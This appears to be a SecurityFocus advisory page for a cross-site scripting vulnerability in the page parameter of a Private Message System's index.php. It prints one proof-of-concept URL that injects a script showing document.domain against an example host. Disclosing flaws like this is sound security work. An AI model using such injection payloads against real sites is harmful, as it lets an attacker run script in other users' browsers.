info
discussion
exploit
solution
references
Private Message System index.php Page Parameter Cross-Site Scripting Vulnerability
The following example was provided:
http://www.example.com/index.php?page=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E
Privacy Statement
Copyright 2010, SecurityFocus
